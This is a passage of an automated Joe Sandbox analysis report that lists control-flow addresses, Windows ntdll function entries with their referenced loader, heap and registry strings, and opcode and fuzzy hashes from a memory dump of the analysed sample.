329397b9-329397fb 647->658 659 329397af-329397b2 647->659 657 32939871-32939886 RtlDebugPrintTimes 648->657 649->644 660 32939528-3293952b 649->660 662 3293952f-32939531 650->662 652->653 663 32939844-3293984b 653->663 664 3293984d 653->664 667 32939406-32939414 654->667 665 329393d2-329393e9 655->665 666 329393a7-329393d0 call 32938093 655->666 657->561 657->641 658->657 659->658 660->662 669 32939533-32939535 662->669 670 3293953b 662->670 671 32939851-32939857 663->671 664->671 665->667 673 32939418-3293946f call 328d8f40 RtlDebugPrintTimes 666->673 667->673 684 329395a1-329395bb 668->684 685 329395bd-329395d8 668->685 669->670 677 32939537-32939539 669->677 670->630 678 32939859-3293985c 671->678 679 3293985e-32939864 671->679 673->561 690 32939475-32939477 673->690 677->630 678->637 679->648 687 32939866 679->687 688 329395dd-3293960b RtlDebugPrintTimes 684->688 685->688 686->611 687->637 688->561 692 32939611-32939617 688->692 690->641 692->618
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: $ $0
                                                                                                                                                                                                  • API String ID: 3446177414-3352262554
                                                                                                                                                                                                  • Opcode ID: 46f2b96d39a2478db3ba803df8e1100337cdd465b59cd95906c8ae551c6f601e
                                                                                                                                                                                                  • Instruction ID: 3a697b71fa741e4ed9540739b4a39a91e269be93aa182f58e97f091f37d572a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46f2b96d39a2478db3ba803df8e1100337cdd465b59cd95906c8ae551c6f601e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A3217B56093818FE351CF68C884B5BBBE9BBC8348F04492EF69987350DB74D949CB52
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 3288651C
                                                                                                                                                                                                    • Part of subcall function 32886565: RtlDebugPrintTimes.NTDLL ref: 32886614
                                                                                                                                                                                                    • Part of subcall function 32886565: RtlDebugPrintTimes.NTDLL ref: 3288665F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • apphelp.dll, xrefs: 32886446
                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 328E9790
                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 328E9783, 328E9796, 328E97BF
                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 328E977C
                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 328E97A0, 328E97C9
                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 328E97B9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 3446177414-204845295
                                                                                                                                                                                                  • Opcode ID: 913345cad55d7bec55f5e3db1eb3799dc120cdf75850317e2eccf477f0e6189a
                                                                                                                                                                                                  • Instruction ID: 42e3bfc48356e0a4d4831830c99a51cd43b9fd90715e616499f48065c9b26685
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913345cad55d7bec55f5e3db1eb3799dc120cdf75850317e2eccf477f0e6189a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E651B2792493089FF314CF28CC91AAB77E8EF85744F44091DFA9997260EA70D949CB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                  • API String ID: 0-3532704233
                                                                                                                                                                                                  • Opcode ID: fb4150849ce1e222d96c43c2dc85f1016857a3ff32194047f93eec2fb839fd89
                                                                                                                                                                                                  • Instruction ID: f3c7e72e01343df921efa57f2e2c1b9c7a27f4d90ca0422dfa4c77fb5f3c3169
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4150849ce1e222d96c43c2dc85f1016857a3ff32194047f93eec2fb839fd89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FB1AABA9083459FD715CF28C480B9FB7E8AF89758F41492EF899D7211DB70D908CB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 328BD879
                                                                                                                                                                                                    • Part of subcall function 32894779: RtlDebugPrintTimes.NTDLL ref: 32894817
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 3446177414-1975516107
                                                                                                                                                                                                  • Opcode ID: be0a42dd0834576f5c6e90486e831767c3f90859b78cbfc58b8637a1cb89d312
                                                                                                                                                                                                  • Instruction ID: 4142adcfc6fdcc3d4ce3ceb07658f42d5f560542c3ba7934308bec5e5ce27ab4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: be0a42dd0834576f5c6e90486e831767c3f90859b78cbfc58b8637a1cb89d312
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51E27DA08349AFEF04CFA8C88479DBBB1BF44318F54445DD818AB781DB75A986CB80
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • @, xrefs: 3288D09D
                                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3288D202
                                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3288D06F
                                                                                                                                                                                                  • @, xrefs: 3288D24F
                                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3288D136
                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3288D263
                                                                                                                                                                                                  • @, xrefs: 3288D2B3
                                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3288D0E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                  • API String ID: 0-1356375266
                                                                                                                                                                                                  • Opcode ID: dc1fa23a14f00fbd7d4200d15ba47feeeb6594289010569a5e20ab3024db60d4
                                                                                                                                                                                                  • Instruction ID: ed8ba30da8f086054097fea6eac59564b3bd2e15eba50f14b5f5a6461092d75c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc1fa23a14f00fbd7d4200d15ba47feeeb6594289010569a5e20ab3024db60d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A12BBA5083459FE321CF64C480B9BF7E8AF88759F40492EF99996241DB74D908CB93
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • VerifierDebug, xrefs: 32918925
                                                                                                                                                                                                  • HandleTraces, xrefs: 3291890F
                                                                                                                                                                                                  • VerifierDlls, xrefs: 3291893D
                                                                                                                                                                                                  • VerifierFlags, xrefs: 329188D0
                                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 3291880F
                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 329186E7
                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 329186BD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                                  • Opcode ID: 986f2fef7ec7e91301062af66699fa35ee842464e68cbd630f3925228aa5e1a6
                                                                                                                                                                                                  • Instruction ID: 1b407f76664fe1e3cbf8dd738fc66a658879add65ed52217529715e0c1d829ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 986f2fef7ec7e91301062af66699fa35ee842464e68cbd630f3925228aa5e1a6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA915575545359AFF311CF299880B2AB7A8BF40718F4908D8FA906B351CB78BC09DB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • apphelp.dll, xrefs: 328B2382
                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 328FA7AF
                                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 328FA79F
                                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 328FA7A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                                  • Opcode ID: 6caa810119fe7e4b1c1dd4f3ece6e769713f6e52a1ebd53847321837699e5a1b
                                                                                                                                                                                                  • Instruction ID: 8e8943fe298a6a721cf7791cd35368dc370ceeb8176f31e603308ea07ae6c14a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6caa810119fe7e4b1c1dd4f3ece6e769713f6e52a1ebd53847321837699e5a1b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B31287DA44204BFF7149F58CC80EA977B8EF84B24F184469E908BB350DAB19882CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                  • Opcode ID: ff379a7f423514f72d23f9ce38ee30358ab36d0b389e6489f17cfd57a8e18f41
                                                                                                                                                                                                  • Instruction ID: da07481a5ed96605451e583f4a81bd7cd5c55609f64778a1bd32a646e8c76d46
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff379a7f423514f72d23f9ce38ee30358ab36d0b389e6489f17cfd57a8e18f41
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3342F17D2083819FE305CF28C884B2ABBE5FF99348F444969E89ACB351DB74D945CB52
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                  • Opcode ID: f576fb536975b4999773ea23d2c4f35a89aaec3b3196722d44d5aac036285028
                                                                                                                                                                                                  • Instruction ID: 872fa6b5657a1148b3d182e62660b9173edc1e10ef0ccd8630896dbdb87087a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f576fb536975b4999773ea23d2c4f35a89aaec3b3196722d44d5aac036285028
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DC1577DA00359AFEB048B6CDCA0BBE77A1AF55308F54816AE9159B290EFB5DC44C390
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                                  • Opcode ID: 5df4c2ac32f0000160c9ecdac44108c132f7af00411ef42692367f484018e272
                                                                                                                                                                                                  • Instruction ID: 5b804fce21af6c8266a4cc23cc31af16bf654d455e449f84b239cf21d0fd52d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5df4c2ac32f0000160c9ecdac44108c132f7af00411ef42692367f484018e272
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D912578A0632CDFF714CF28CC44BAAB7A4AF85754F088179E9147B281DBB49842CF95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32901FA9
                                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 32901F6A, 32901FA4, 32901FC4
                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32901F82
                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32901FC9
                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32901F8A
                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 32901F6F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                                  • Opcode ID: a549fdea3e4d6e4de2fa6c1b4452890f3c3fd790d336c5d6b2cfa72324633f18
                                                                                                                                                                                                  • Instruction ID: 3eba61792ab94288aca4afad85691bacfbb9abcde6c054c4d25bbb948438669f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a549fdea3e4d6e4de2fa6c1b4452890f3c3fd790d336c5d6b2cfa72324633f18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0731C77AA002287BF7109B8A9C44F5BBB68DF45B58F014075BA14B7396DB70EE00CBE5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                                  • Opcode ID: cdd5131c8cffc41f7d41b840226618ae42daf1f13d160645a53863dd339cb5da
                                                                                                                                                                                                  • Instruction ID: 5fcf6045a5318109c91353bab142775dbfccdfc19c33283968746401109d67ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdd5131c8cffc41f7d41b840226618ae42daf1f13d160645a53863dd339cb5da
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F1CF78A01705EFE704CF68C8A0F6AB7B5FF84344F1481A9E9199B781DB75E981CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                  • API String ID: 3446177414-2283098728
                                                                                                                                                                                                  • Opcode ID: 4fd85a0890976f061897fb995a14ee9837fe506c93b810046f914333d5d2ebdf
                                                                                                                                                                                                  • Instruction ID: c6b56e8bf3eaf221a83babdb8f3174c01fe44cff22cd62828265506bea4bbf07
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd85a0890976f061897fb995a14ee9837fe506c93b810046f914333d5d2ebdf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E51047C2047059FEB14DF38C880B2977D1BF88314F080A6CE9699B791EB709846CF81
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 329080E2
                                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 329080E9
                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 329080F3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 3446177414-1783798831
                                                                                                                                                                                                  • Opcode ID: 7ae633e307c3da597cd37911dafa92f9701057a979a2e48be11808d65908d901
                                                                                                                                                                                                  • Instruction ID: 42fbe95b1a55be95c450fca8a8929bfa8d3b0d5fa4c22180d2a935ea47b6f859
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ae633e307c3da597cd37911dafa92f9701057a979a2e48be11808d65908d901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 814126B9549314ABE710EB68DD40F5BB7E8EF44B50F04492EF858E7251EB70D842CB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 3291450F
                                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32914508
                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32914519
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                  • API String ID: 3446177414-3154609507
                                                                                                                                                                                                  • Opcode ID: 54c4820dc42c2868e90080b28e7f473e5d38193bc1f7044cd1003cacd5d92f81
                                                                                                                                                                                                  • Instruction ID: 03421047d1688f26b786b8ac6dd1d165bb3b5ec62e9d1a87f8ad0f854c81c5f1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54c4820dc42c2868e90080b28e7f473e5d38193bc1f7044cd1003cacd5d92f81
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1141C376605719DFEB11CF5AC841A1677E8AF4C754F051669EC5C9B391DB30F800CB91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 328B514A
